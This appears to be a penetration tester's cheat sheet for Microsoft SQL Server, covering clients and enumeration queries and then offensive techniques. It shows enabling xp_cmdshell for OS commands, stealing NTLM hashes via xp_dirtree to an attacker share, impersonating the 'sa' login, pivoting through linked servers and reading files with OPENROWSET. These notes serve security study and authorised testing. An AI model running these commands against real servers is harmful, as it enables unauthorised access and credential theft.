MSSQL π
Microsoft SQL Server (MSSQL) is a relational database management system developed by Microsoft. It's often used by developers when building .NET applications.
SQL Server Management Studio (SSMS) is a graphical client that can be installed along MSSQL or separately. It allows database administrators, developers, and other users to perform various tasks related to SQL Server databases.
π² MSSQL default port is 1433 or 2433 (TCP) and 1434 (UDP).
Common commands:
select name from sys.databases -- list databases
select name from sys.databases where name not in ('master', 'tempdb', 'model', 'msdb');
use db_name; -- select a database
-- list the tables in the database
select table_name from information_schema.tables where table_type = 'base table';
-- list the columns of the table "table_name_here"
select column_name, data_type from information_schema.columns where table_name = 'table_name_here';
-- list users (1), and sysadmins (2)
SELECT name, password,sysadmin FROM syslogins
SELECT name FROM sys.server_principals WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1;
MSSQL Clients
Windows client β sqlcmd
On Windows, you can use the sqlcmd utility.
PS> # -E == Windows Auth | -Q == Query
PS> sqlcmd -E -Q "select name from sys.databases"
PS> sqlcmd -E -i query.sql
PS> sqlcmd -S server_name -U sa -P password [...]
If WMI (DCOM) is available, from a Linux host, you can access sqlcmd
after popping a powershell:
$ impacket-wmiexec username:password@IP -shell-type powershell
Windows client β PowerUpSQL
On Windows, you can use PowerUpSQL (2.3k β).
PS> Import-Module .\PowerUpSQL.ps1
PS> Get-SQLInstanceDomain
PS> Get-SQLQuery -Verbose -Instance "IP,1433" -username "example\username" -password "password" -query 'Select @@version'
Linux client β sqlsh
You can use sqlsh on Linux.
$ sqsh -S IP -U 'username' -P 'password' -h
$ sqsh -S IP -U '.\\username' -P 'password' -h
1> some query
2> go
Linux client β impacket
You can alternatively use mssqlclient.
$ impacket-mssqlclient username@IP -windows-auth
$ impacket-mssqlclient username:password@IP -windows-auth
The SQL Server might user Windows Authentication or Username/Password Authentication. Use or remove-windows-auth
accordingly.
MSSQL Pentester Notes β οΈ
Enumeration
- We can use nmap to run scripts
$ nmap -sC -sV --script "*ms-sql*" -p 1433 IP
- Look for interesting Metasploit modules.
mfs6> search mssql/
FootHold
- You can use Metasploit to XXX.
mfs6> use mssql_enum_sql_logins
mfs6> set RHOSTS IP
mfs6> set USERNAME username
mfs6> set PASSWORD password
mfs6> set USE_WINDOWS_AUTHENT true
mfs6> run
Exploitation - Part I
-
xp_cmdshell
can be used to run commands. It's disabled by default. The command is runs with the same permissions as the server.
-- [EXECUTE] sp_configure 'show advanced options', 1
-- RECONFIGURE
-- [EXECUTE] sp_configure 'xp_cmdshell', 1
-- RECONFIGURE
xp_cmdshell 'whoami'
Note that you can use enable_xp_cmdshell
in impacket-mssqlclient
.
- We can steal hashes by setting up a responder
EXEC master..xp_dirtree '\\IP\share\'
EXEC master..xp_subdirs '\\IP\share\'
- We may be able to impersonate users:
-- list users we can impersonate
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
-- impersonate user 'sa'
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER('sysadmin')
REVERT # cancel impersonation
Exploitation - Part II
- Extended Store Procedures
- CLR Assemblies
- SQL Server Agent Jobs
- External Scripts
-
xp_regwrite
can be used to create registry entries - User Defined Functions in C/C++ (ex)
Lateral Movement
The current server may be linked to other servers. If we compromise it, we may be able to run SQL queries on linked servers.
- List Linked Servers
SELECT srvname, isremote FROM sysservers
- Execute a SQL Query on a Linked Server
EXEC('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [your_target_here]
EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [your_target_here]
Additional Notes
-
If installed, look for saved credentials in SSMS
-
The services often runs as
NT SERVICE\MSSQLSERVER
-
By default, encryption is not enforced when attempting to connect.
π» To-do π»
Stuff that I found, but never read/used yet.
- Try running the tool as administrator
- HeidiSQL, SQLPro, mssql-cli
- System Databases
SELECT name FROM master.dbo.sysdatabases
SELECT table_name FROM xxx.INFORMATION_SCHEMA.TABLES
Write files
-- enable to write
sp_configure 'show advanced options', 1
RECONFIGURE
sp_configure 'Ole Automation Procedures', 1
RECONFIGURE
-- use it...
-- can read any file
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
SSMS
- File > New > Query with current connection
- Press execute to run the file
- Need to add
GO
?